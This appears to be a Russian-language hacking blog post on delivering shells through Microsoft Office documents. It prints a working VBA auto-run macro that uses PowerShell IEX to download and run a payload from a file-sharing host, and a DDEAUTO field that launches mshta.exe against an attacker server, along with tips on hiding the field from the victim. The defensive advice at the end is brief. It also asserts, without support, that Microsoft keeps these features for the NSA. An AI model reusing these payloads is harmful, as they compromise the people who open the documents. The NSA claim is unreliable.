Думаю, каждый из нас наверняка помнит такую составляющую Microsoft Office, как макрос. Возможно, кто-то сразу вспомнит и об OLE. Что это сегодня может нам дать? Ответ прост: VB скрипт помещаем в макрос и отправляем данный документ жертве. Ничего сложного, а приём работает и по наше время. Так что? Поговорим об этом подробнее?
<h2 style=»text-align: left;»>Макросы</h2>
Наверняка многие из вас задавались в своё время вопросом, почему Microsoft не хочет отключать данные функции? Я уже писал раннее, что это все делается для АНБ и других структур, чтобы им проще было в своей работе. Windows, Office, IE, MSE и многое другое содержат дыры, а когда White Hat придают найденным уязвимостям огласку, они закрываются с релизом новой версии, а другие появляются. А все потому, что Windows самая популярная ОС среди рядовых пользователей. Если вы в курсе, то Win 10 раздает данные о вас примерно на 50 адресов серверов MS. Так что можно легко сделать вывод, что тотальная слежка уже давно ведется за всеми нами. Скорее, конечно, это 3 мировая информационная война, но суть вы уяснили))) Берегите близких, предупреждайте их.
А теперь ближе к делу…
Здесь указаны настройки по умолчанию. Забавно, не так ли? А чтобы их найти, это еще надо покапаться, а рядовому пользователю это вообще тяжело. А значит пользователь в 80% случаев клацнет по всплывающему окну. Специально скачал 2016 офис для этой статьи.
Думаю, эта картинка знакома всем, правда?
А после клика появляется шелл, можно делать все, что захотим =)) Причем специально сделал разные подсети 192.168.1.0 и 10.0.2.0 Тут не важно откуда жертва получит файл, из внешней сети или локалки. Хотя макрос совершенно обычный.
Sub Auto_Open() Dim exec As String exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://rgho.st/private/6HV4lXWb6/c88987117ccd2e4b9c639a10da043804/payload.txt '))""" Shell (exec) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub
Сама суть данного подхода — сгенерировать шел, залить его на обменник и заставить жертву его скачать. А функция автозапуска сделает все остальное. Естественно, для таких вещей надо создавать документ с поддержкой макросов, а это уже бросается в глаза.
В видео ниже покажу более наглядно. Ладно, хватит про макросы.
<h2 style=»text-align: left;»>DDE</h2>
Функция Microsoft Dynamic Data Exchange (DDE) на самом деле не новая. И ее использовали довольно часто на моей памяти. Не скажу, что для плохих целей, а скорее для удобства работы. Эта функция помогает подгружать данные из одного приложения Office в другое. Картинки из презентации автоматом могут подгружаться в документ ворд для отчета. Довольно удобно и те, кто этим часто пользуется даже не парится о предупреждениях. А вот и зря…
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.1.12:8080/ZW8yLYaXnHlRN"
Вот такой обычный код, вставленный в документ, открывает шелл 🙂 И мы снова можем наблюдать картинку )))
Самое приятное в этом коде, что идет обфускация и выводится запись запуска MS Word. Я не скрывала формулу, ее можно запихнуть в конец документа и видно не будет. Это вовсе не проблема =) А кто раньше использовал уже DDE, сталкивался с проблемой, что выскакивает табличка с надписью cmd.exe, что безусловно напрягает =)
Стандартная формула вызова калькулятора -> без обфускации и т.п.
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
Не знаю как вас, но меня бы сразу напрягла команда, которая содержит cmd.exe ))
Кстати, DDE пашет и в Outlook ))) Так что эксперементируйте и получайте удовольствие ))
Как итог: макросы отключаем вот так! Чтобы никаких уведомлений не было.
А DDE даже не используйте без крайней необходимости. Если сразу нажать отмену, команда не запустится.
В видео будет маленький бонус ) для облегчения написания шелов в DDE.
На сегодня всё 😉